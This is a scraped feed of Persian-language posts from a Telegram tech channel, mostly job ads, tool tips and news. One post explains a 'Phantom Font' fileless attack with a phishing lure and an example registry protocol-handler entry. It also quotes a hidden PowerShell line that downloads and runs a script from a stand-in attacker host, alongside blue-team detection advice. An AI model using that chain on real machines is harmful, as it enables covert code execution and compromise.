تیم Ciclo (استارتاپ فعال گروه گلرنگ ونچرز) دنبال دو همتیمی پرانرژی هست تا با هم مسیر رشد و توسعه اپلیکیشنمون رو جلو ببریم! اگر تجربه یا علاقه دارید تو فضای استارتاپی کار کنید، خوشحال میشیم پیام بدید.
موقعیتها:
Front-end developer (React Native / PWA)
Back-end developer (Python / Django)
📩 رزومهتون رو میتونید به این آدرس بفرستید یا از طریق لینکدین با من در تماس باشید:
manihamzezadehz@gmail.com
#استخدام
#ریموت
#فرصت_شغلی
#استارتاپ
#Hiring
Please open Telegram to view this post
VIEW IN TELEGRAM
📜 راهنمای سریع ابزارهای تحلیل لاگ (Log Parsing Cheat Sheet)
🔍 ابزارهای اصلی تحلیل لاگ
1️⃣ GREP - جستجوی الگو در فایلها
2️⃣ NGREP - تحلیل پکتهای شبکه
3️⃣ CUT - استخراج فیلدهای ساختاریافته
4️⃣ SED - ویرایش و جایگزینی متن
5️⃣ SORT - مرتبسازی دادهها
6️⃣ UNIQ - حذف موارد تکراری
7️⃣ DIFF - مقایسه فایلها
8️⃣ AWK - پردازش دادههای پیشرفته
📂 ابزارهای مشاهده و مدیریت فایلها
1️⃣ HEAD - نمایش ابتدای فایل
2️⃣ TAIL - نمایش انتهای فایل
3️⃣ LESS - مشاهده هوشمند فایلها
4️⃣ COMM - مقایسه خطوط مشترک دو فایل
📊 ابزارهای تخصصی فرمتها
1️⃣ CSVCUT - پردازش فایلهای CSV
2️⃣ JQ - پردازش فایلهای JSON
3️⃣ TR - جایگزینی کاراکترها
4️⃣ CCZE - رنگیسازی لاگها
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
#linux #Cybersecurity #log
🔍 ابزارهای اصلی تحلیل لاگ
1️⃣ GREP - جستجوی الگو در فایلها
2️⃣ NGREP - تحلیل پکتهای شبکه
3️⃣ CUT - استخراج فیلدهای ساختاریافته
4️⃣ SED - ویرایش و جایگزینی متن
5️⃣ SORT - مرتبسازی دادهها
6️⃣ UNIQ - حذف موارد تکراری
7️⃣ DIFF - مقایسه فایلها
8️⃣ AWK - پردازش دادههای پیشرفته
📂 ابزارهای مشاهده و مدیریت فایلها
1️⃣ HEAD - نمایش ابتدای فایل
2️⃣ TAIL - نمایش انتهای فایل
3️⃣ LESS - مشاهده هوشمند فایلها
4️⃣ COMM - مقایسه خطوط مشترک دو فایل
📊 ابزارهای تخصصی فرمتها
1️⃣ CSVCUT - پردازش فایلهای CSV
2️⃣ JQ - پردازش فایلهای JSON
3️⃣ TR - جایگزینی کاراکترها
4️⃣ CCZE - رنگیسازی لاگها
#linux #Cybersecurity #log
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
بعضیها رسماً به مرحلهای رسیدن که دارن «چیزهای رایگان» رو هم میفروشن!
این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همهست… ولی دیدم بعضیها همین رو بستهبندی کردن و با قیمت بالا میدن به ملت 🤦♂️
هیچ جادوی خاصی پشتش نیست، فقط یک docker pull سادهست!
واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.
📂 لینک نسخه آماده روی Docker Hub:
https://hub.docker.com/r/sakurashiro/nessus
#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همهست… ولی دیدم بعضیها همین رو بستهبندی کردن و با قیمت بالا میدن به ملت 🤦♂️
هیچ جادوی خاصی پشتش نیست، فقط یک docker pull سادهست!
واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.
📂 لینک نسخه آماده روی Docker Hub:
https://hub.docker.com/r/sakurashiro/nessus
#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍3👏1🕊1
اگر تجربه کار با Laravel داری و زبان انگلیسیت خوبه,
جات توی تیم ما خالیه!
ما یک تیم استرالیایی هستیم که روی پروژههای بینالمللی کار میکنیم و محیط کار کاملاً ریموت و دوستانه داریم.
شرایط کلی:
تسلط به Laravel و PHP
مهارتهای خوب انگلیسی برای ارتباط با تیم و کلاینتها
تعهد و روحیه تیمی
محل کار: ریموت (تماموقت)
حقوق: بر اساس مهارت و تجربه
اگر علاقهمند هستید، فرم زیر را پر کنید تا با شما تماس بگیریم:
https://docs.google.com/forms/d/e/1FAIpQLScCvHwuSESc6tL9XuojivlSNWEVTJKNbMCr6E0Gpmrk3QyqiQ/viewform?usp=dialog
#استخدام #آگهي_شغلي #دوركاري #ريموت #برنامه_نويسي #فرصت_شغلي #لاراول #laravel #php
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
جات توی تیم ما خالیه!
ما یک تیم استرالیایی هستیم که روی پروژههای بینالمللی کار میکنیم و محیط کار کاملاً ریموت و دوستانه داریم.
شرایط کلی:
تسلط به Laravel و PHP
مهارتهای خوب انگلیسی برای ارتباط با تیم و کلاینتها
تعهد و روحیه تیمی
محل کار: ریموت (تماموقت)
حقوق: بر اساس مهارت و تجربه
اگر علاقهمند هستید، فرم زیر را پر کنید تا با شما تماس بگیریم:
https://docs.google.com/forms/d/e/1FAIpQLScCvHwuSESc6tL9XuojivlSNWEVTJKNbMCr6E0Gpmrk3QyqiQ/viewform?usp=dialog
#استخدام #آگهي_شغلي #دوركاري #ريموت #برنامه_نويسي #فرصت_شغلي #لاراول #laravel #php
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد میشود!
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
چرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javanoscript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javanoscript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javanoscript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
🔸 هر اجرای ناگهانی mshta بدون فایل
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
C:\\Windows\\System32\\mshta.exeچرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javanoscript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
.reg را دانلود میکند.2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
fontview:// تعریف میکند.و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javanoscript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
fontview://load ریدایرکت میشود.پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javanoscript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید🔸 هر اجرای ناگهانی mshta بدون فایل
.hta را بررسی کنید🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏2🔥1🎉1🤩1
هفت پلتفرم برای پیدا کردن شغل ریموت در ML/DL
ویژه مهندسان ایرانی
اگر ML/DL Engineer هستید و از ایران به دنبال فرصتهای ریموت یا با ویزا میگردید، این ۷ پلتفرم رو از دست ندین.
1. Wellfound (قبلاً AngelList):
– پلتفرم استارتاپها.
– مستقیم به Founder/CTO پیام بدید و فیلتر Seed–Series B برای تیمهای AI رو بزنید.
– پروفایلتون رو با GitHub لینک کنید!
2. RemoteOK:
– بورد ریموت با الرت روی کیوردهایی مثل "machine learning" یا "computer vision"
– تگ "Visa Sponsorship" رو اضافه کنید تا اولین اپلایکننده باشید.
3. Remotive :
– ریموت با فیلتر Time-Zone
– Newsletterشون رو subscribe کنید برای نقشهای انحصاری.
4. We Work Remotely:
- جستجوی پیشرفته با "Worldwide + AI/ML"
– عالی برای نقشهای senior با پروژههای واقعی مثل PyTorch.
5. Relocate.me:
– نقشهای فنی با ویزا و relocation.
– فیلتر "Visa Sponsorship" بزنید، به خصوص برای کانادا/آلمان که برای ایرانیها بازتره.
6. Landing.jobs:
– بورد اروپا (پرتغالمحور).
– Assessmentهای فنی رو پاس کنید تا به pool بالاتری برید
– تمرین LeetCode-style برای ML algorithms مثل CNN.
7.iBRIDGES:
– شبکه ایرانیان خارج.
– از LinkedIn برای connect مستقیم با فاندرهای AI در اروپا/آمریکا استفاده کنید.
پیشنهاد:
اینها رو با LinkedIn ترکیب کنید، رزومهتون رو ATS-friendly کنید. یعنی رزومه طوری نوشته بشه که سیستمهای غربالگری خودکار (Applicant Tracking System) بتوانند آن را به راحتی بخوانند و کلمات کلیدی مهم را شناسایی کنند.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
ویژه مهندسان ایرانی
اگر ML/DL Engineer هستید و از ایران به دنبال فرصتهای ریموت یا با ویزا میگردید، این ۷ پلتفرم رو از دست ندین.
1. Wellfound (قبلاً AngelList):
– پلتفرم استارتاپها.
– مستقیم به Founder/CTO پیام بدید و فیلتر Seed–Series B برای تیمهای AI رو بزنید.
– پروفایلتون رو با GitHub لینک کنید!
2. RemoteOK:
– بورد ریموت با الرت روی کیوردهایی مثل "machine learning" یا "computer vision"
– تگ "Visa Sponsorship" رو اضافه کنید تا اولین اپلایکننده باشید.
3. Remotive :
– ریموت با فیلتر Time-Zone
– Newsletterشون رو subscribe کنید برای نقشهای انحصاری.
4. We Work Remotely:
- جستجوی پیشرفته با "Worldwide + AI/ML"
– عالی برای نقشهای senior با پروژههای واقعی مثل PyTorch.
5. Relocate.me:
– نقشهای فنی با ویزا و relocation.
– فیلتر "Visa Sponsorship" بزنید، به خصوص برای کانادا/آلمان که برای ایرانیها بازتره.
6. Landing.jobs:
– بورد اروپا (پرتغالمحور).
– Assessmentهای فنی رو پاس کنید تا به pool بالاتری برید
– تمرین LeetCode-style برای ML algorithms مثل CNN.
7.iBRIDGES:
– شبکه ایرانیان خارج.
– از LinkedIn برای connect مستقیم با فاندرهای AI در اروپا/آمریکا استفاده کنید.
پیشنهاد:
اینها رو با LinkedIn ترکیب کنید، رزومهتون رو ATS-friendly کنید. یعنی رزومه طوری نوشته بشه که سیستمهای غربالگری خودکار (Applicant Tracking System) بتوانند آن را به راحتی بخوانند و کلمات کلیدی مهم را شناسایی کنند.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1🔥1
یکی از دوستان نیازمند نیروی اندروید کار و IOS کار هست
اگر رزومه خوبی دارید به ایدی زیر رزومه تونو بفرستید
مشهد - دورکاری
@Developer_Network
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اگر رزومه خوبی دارید به ایدی زیر رزومه تونو بفرستید
مشهد - دورکاری
@Developer_Network
Please open Telegram to view this post
VIEW IN TELEGRAM
دوستانی که قصد اموزش " نگارش مقاله "
به صورت تضمینی برای Q1
که به شدت سختگیرانه شده در دنیا رو دارند
به ایدی زیر از دوستان ما هستند اعلام امادگی کنند
نگارش این مقاله برای حوزه امنیت و IOT و هوش مصنوعی خواهد بود
و بخشی مربوط به پزشکی
که همچنان این مقالات در بالاترین رده ی علمی در دنیا یعنی Q1 هست ...
@Developer_Network
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
به صورت تضمینی برای Q1
که به شدت سختگیرانه شده در دنیا رو دارند
به ایدی زیر از دوستان ما هستند اعلام امادگی کنند
نگارش این مقاله برای حوزه امنیت و IOT و هوش مصنوعی خواهد بود
و بخشی مربوط به پزشکی
که همچنان این مقالات در بالاترین رده ی علمی در دنیا یعنی Q1 هست ...
@Developer_Network
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1👏1🎉1👨💻1
استخدام گرافیست
مشهد
شرکت معتبر
حقوق و بیمه مزایا دارد...
لطفا روزمه رو به ایدی زیر ارسال کنید
@Developer_Network
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
مشهد
شرکت معتبر
حقوق و بیمه مزایا دارد...
لطفا روزمه رو به ایدی زیر ارسال کنید
@Developer_Network
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 هشدار امنیتی فوری 🚨
اخیراً اطلاعات ورود بسیاری از حسابهای گوگل در اینترنت افشا شده است!
حتی اگر ورود دو مرحلهای رو برای حساب گوگل خود فعال کردهاید، باز هم لازم است همین حالا رمز عبور خود را تغییر دهید
🔒 برای امنیت بیشتر:
از رمز عبور قوی و غیرتکراری استفاده کنید
⏳ هر لحظه تأخیر ممکن است حساب شما را در معرض خطر قرار دهد.
👉 همین الان رمز عبور حساب گوگل خود را تغییر دهید
https://www.yahoo.com/news/articles/google-sounds-alarm-massive-data-174500558.html
https://www.forbes.com/sites/zakdoffman/2025/08/25/google-warns-most-gmail-users-must-change-passwords/
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اخیراً اطلاعات ورود بسیاری از حسابهای گوگل در اینترنت افشا شده است!
حتی اگر ورود دو مرحلهای رو برای حساب گوگل خود فعال کردهاید، باز هم لازم است همین حالا رمز عبور خود را تغییر دهید
🔒 برای امنیت بیشتر:
از رمز عبور قوی و غیرتکراری استفاده کنید
⏳ هر لحظه تأخیر ممکن است حساب شما را در معرض خطر قرار دهد.
👉 همین الان رمز عبور حساب گوگل خود را تغییر دهید
https://www.yahoo.com/news/articles/google-sounds-alarm-massive-data-174500558.html
https://www.forbes.com/sites/zakdoffman/2025/08/25/google-warns-most-gmail-users-must-change-passwords/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤1🤯1😱1
آیا پذیرش در دانشگاههای آمریکا هم سهمیهای است؟
◾️دانشگاههای خصوصی: دانشگاه هاروارد، مثل خیلی از دانشگاههای برتر خصوصی، دو مسیر برای پذیرش دارد. یکی مسیر عادی که دانشجویان را بر اساس شایستگیهای فردی ارزیابی میکند و مسیر دومی که دانشجویان را از طریق چهار سهمیه پذیرش میکند: ورزشکاران، Legacies (فرزندان فارغالتحصیلان)، Dean's Interest List (فرزندان ثروتمندان) و فرزندان اساتید. اگرچه جزئیات سهمیهبندی جایی گفته نمیشود، برآورد شده تا ۳۰ درصد پذیرفتهشدگان هاروارد سهمیهای هستند. این سهمیهها البته بشدت به نفع سفیدپوستان استفاده میشدند.
◾️دانشگاههای دولتی: سهمیهبندی در دانشگاههای دولتی، به سبب رقابت کمتر، به ندرت وجود دارد. برای مثال سهمیه Legacy در اغلب دانشگاههای ایالتی غیرقانونی است. همینطور فرزندان اساتید سهمیهای ندارند اما در صورت پذیرش، از تخفیف شهریه برخوردار میشوند. در این زمینه یک استثنا وجود داشت. با اوج گرفتن جنبشهای مدنی در آمریکا از ۱۹۶۰ به بعد، دانشگاهها شروع به سیاستگذاریهایی کردند تا شانس بیشتری به گروههایی که بطور تاریخی محروم قرار گرفتهاند داده شود. این مساله که به عنوان affirmative action شناخته میشد، سهمیه خاصی برای گروههای نژادی (خصوصا سیاهپوستان) تعریف میکرد.
◾️چالشهای قانونی: در سال ۲۰۲۳ دادگاه عالی آمریکا رای به غیرقانونی بودن درنظرگیری نژاد بعنوان عاملی برای پذیرش در دانشگاههای آمریکا داد. حتی دانشگاههای خصوصی هم شامل این مساله شدند بطوریکه اگرچه سهمیههایی که برای مثال در هاروارد ذکر شد همچنان پابرجا باقی مانده است، اما فاکتور نژاد باید از آن حذف شود. همچنین تعیین درصد ثابت برای هر نوع سهمیهای غیرقانونی است.
◾️سهمیه نظامیها: در دانشگاههای آمریکا سهمیهای برای ارتشیها و یا نظامیهای آسیبدیده در جنگ و خانواده آنها وجود ندارد اما چنین مواردی میتواند به عنوان امتیاز مثبت در فرآیند پذیرش در نظر گرفته شود.
◾️کلام آخر: بحث پذیرش در دانشگاههای آمریکا بسیار مفصل است و من اینجا صرفا در حد کشش یک پست لینکدین در مورد آن نوشتم. اما خوب است بگویم که اساسا در سیستم سرمایهداری آمریکا، پول در آموزش عالی، مثل هر زمینهی دیگری، حرف اول و آخر را میزند، طوریکه میتوانیم ضربالمثل معروف خودمان را اینطور بازگو کنیم که شما دانشجویی از خانواده پولدار باش، روی سبیل رئیس دانشگاه هاروارد نقاره بزن!
✍️دکتر قدرت ابادی
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
◾️دانشگاههای خصوصی: دانشگاه هاروارد، مثل خیلی از دانشگاههای برتر خصوصی، دو مسیر برای پذیرش دارد. یکی مسیر عادی که دانشجویان را بر اساس شایستگیهای فردی ارزیابی میکند و مسیر دومی که دانشجویان را از طریق چهار سهمیه پذیرش میکند: ورزشکاران، Legacies (فرزندان فارغالتحصیلان)، Dean's Interest List (فرزندان ثروتمندان) و فرزندان اساتید. اگرچه جزئیات سهمیهبندی جایی گفته نمیشود، برآورد شده تا ۳۰ درصد پذیرفتهشدگان هاروارد سهمیهای هستند. این سهمیهها البته بشدت به نفع سفیدپوستان استفاده میشدند.
◾️دانشگاههای دولتی: سهمیهبندی در دانشگاههای دولتی، به سبب رقابت کمتر، به ندرت وجود دارد. برای مثال سهمیه Legacy در اغلب دانشگاههای ایالتی غیرقانونی است. همینطور فرزندان اساتید سهمیهای ندارند اما در صورت پذیرش، از تخفیف شهریه برخوردار میشوند. در این زمینه یک استثنا وجود داشت. با اوج گرفتن جنبشهای مدنی در آمریکا از ۱۹۶۰ به بعد، دانشگاهها شروع به سیاستگذاریهایی کردند تا شانس بیشتری به گروههایی که بطور تاریخی محروم قرار گرفتهاند داده شود. این مساله که به عنوان affirmative action شناخته میشد، سهمیه خاصی برای گروههای نژادی (خصوصا سیاهپوستان) تعریف میکرد.
◾️چالشهای قانونی: در سال ۲۰۲۳ دادگاه عالی آمریکا رای به غیرقانونی بودن درنظرگیری نژاد بعنوان عاملی برای پذیرش در دانشگاههای آمریکا داد. حتی دانشگاههای خصوصی هم شامل این مساله شدند بطوریکه اگرچه سهمیههایی که برای مثال در هاروارد ذکر شد همچنان پابرجا باقی مانده است، اما فاکتور نژاد باید از آن حذف شود. همچنین تعیین درصد ثابت برای هر نوع سهمیهای غیرقانونی است.
◾️سهمیه نظامیها: در دانشگاههای آمریکا سهمیهای برای ارتشیها و یا نظامیهای آسیبدیده در جنگ و خانواده آنها وجود ندارد اما چنین مواردی میتواند به عنوان امتیاز مثبت در فرآیند پذیرش در نظر گرفته شود.
◾️کلام آخر: بحث پذیرش در دانشگاههای آمریکا بسیار مفصل است و من اینجا صرفا در حد کشش یک پست لینکدین در مورد آن نوشتم. اما خوب است بگویم که اساسا در سیستم سرمایهداری آمریکا، پول در آموزش عالی، مثل هر زمینهی دیگری، حرف اول و آخر را میزند، طوریکه میتوانیم ضربالمثل معروف خودمان را اینطور بازگو کنیم که شما دانشجویی از خانواده پولدار باش، روی سبیل رئیس دانشگاه هاروارد نقاره بزن!
✍️دکتر قدرت ابادی
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍1🔥1👏1🎉1🕊1